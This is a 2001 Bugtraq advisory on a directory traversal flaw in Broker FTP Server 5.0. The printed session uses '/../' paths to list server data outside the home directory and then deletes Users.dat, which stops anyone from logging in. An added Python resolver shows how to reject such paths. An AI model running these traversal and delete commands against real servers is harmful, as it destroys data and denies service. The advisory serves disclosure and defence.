Bugtraq: Broker Ftp Server 5.0 Vulnerability

From: <se00020_at_LION.CC>
Date: Sat, 3 Mar 2001 18:56:23 -0000

Vulnerability:

Users can break out of their root directory and list directories.
Depending on the privileges you have, other commands like delete may be
executed outside of the home directory.

e:\crap\ was used as homedir.
deleting files in e:\crap is enabled

Detail:

Problem: Again relative paths.

dir:
listing directories outside of root dir.
Risk: medium-high

230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Mar 02 12:17 test
-rw-rw-rw- 1 ftp ftp 6 Mar 02 12:33 movedtohomedir.txt
-rw-rw-rw- 1 ftp ftp 11 Mar 02 00:29 bisontest.txt
drw-rw-rw- 1 ftp ftp 0 Mar 03 15:59 HTTP
drw-rw-rw- 1 ftp ftp 0 Mar 03 17:05 huhu
226 File sent ok
FTP: 323 Bytes empfangen in 0,00Sekunden 323000,00KB/s
ftp> cd ..
550 CWD failed. ..: No permission

ftp> dir /../experimental/broker/data/
200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 175 Nov 19 2000 UserGrps.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Users.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:33 Users.4800.bak
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:34 Users.4800-Prof.bak
-rw-rw-rw- 1 ftp ftp 31 Mar 03 16:59 BannCtrl.ini
-rw-rw-rw- 1 ftp ftp 34 Mar 03 17:08 KickCtrl.ini
-rw-rw-rw- 1 ftp ftp 38 Mar 03 16:37 Events_1.dat
-rw-rw-rw- 1 ftp ftp 0 Mar 03 16:53 Events_lst_1.dat
-rw-rw-rw- 1 ftp ftp 154 Mar 03 16:54 Kopie von Users.dat
226 File sent ok
FTP: 629 Bytes empfangen in 0,00Sekunden 629000,00KB/s

delete:
deleting files outside of root dir.

ftp> delete /../experimental/broker/data/users.dat
250 File '/../experimental/broker/data/users.dat' deleted.
ftp> quit
221-Thank you for your visit.
221-
221 Goodbye.

C:\>ftp 10.17.3.44
Verbindung mit 10.17.3.44 wurde hergestellt.
220 FTP Server ready [***]
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
530 Login incorrect.
Anmeldung fehlgeschlagen.
ftp> :(

By deleting users.dat, no one will be able to log on ...

put/get commands seem to be secure...

This was tested with win2k and the trial version of Broker ver. 5.0

se00020_at_fhs-hagenberg.ac.at or
se00020_at_lion.cc
Received on Mar 04 2001
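
Added example, not part of the original post and not Broker's code: the session above shows "cd .." refused while the same ".." inside the argument of dir and delete is accepted, so this sketch routes every path-taking command through one resolver that fails closed. The function names, the reply-code table and the use of Python's ntpath module are assumptions made for illustration; e:\crap and the request paths are the ones from the advisory.

```python
import ntpath  # Windows path rules; importable on any platform


class PathEscape(Exception):
    """The client path resolves outside the user's home directory."""


def resolve(home, cwd, arg):
    r"""Map an FTP path argument to a real path under `home`, or raise PathEscape.

    home: real home directory, e.g. e:\crap as in the advisory
    cwd:  current virtual directory, always starting with "/"
    arg:  raw path argument of CWD, LIST, DELE, ...
    """
    if "\x00" in arg:
        raise PathEscape(arg)
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    stack = []
    for part in virtual.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not stack:
                raise PathEscape(arg)  # would climb above the virtual root
            stack.pop()
        elif ":" in part or part != part.rstrip(". "):
            raise PathEscape(arg)  # drive/stream syntax, or a name Win32 rewrites
        else:
            stack.append(part)
    root = ntpath.normcase(ntpath.normpath(home))
    real = ntpath.normpath(ntpath.join(home, *stack))
    # Second, independent containment check on the final real path.
    if ntpath.commonpath([root, ntpath.normcase(real)]) != root:
        raise PathEscape(arg)
    return real


def handle(home, cwd, line):
    """Reply code for one command line; all path-taking verbs share resolve()."""
    verb, _, arg = line.partition(" ")
    codes = {"CWD": 250, "LIST": 150, "DELE": 250}  # simplified success replies
    if verb.upper() not in codes:
        return 502
    try:
        resolve(home, cwd, arg or ".")
    except PathEscape:
        return 550
    return codes[verb.upper()]
```

The resolver is purely lexical; a server that allows symbolic links or junctions inside the home directory also needs a check on the resolved on-disk path before opening or deleting.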
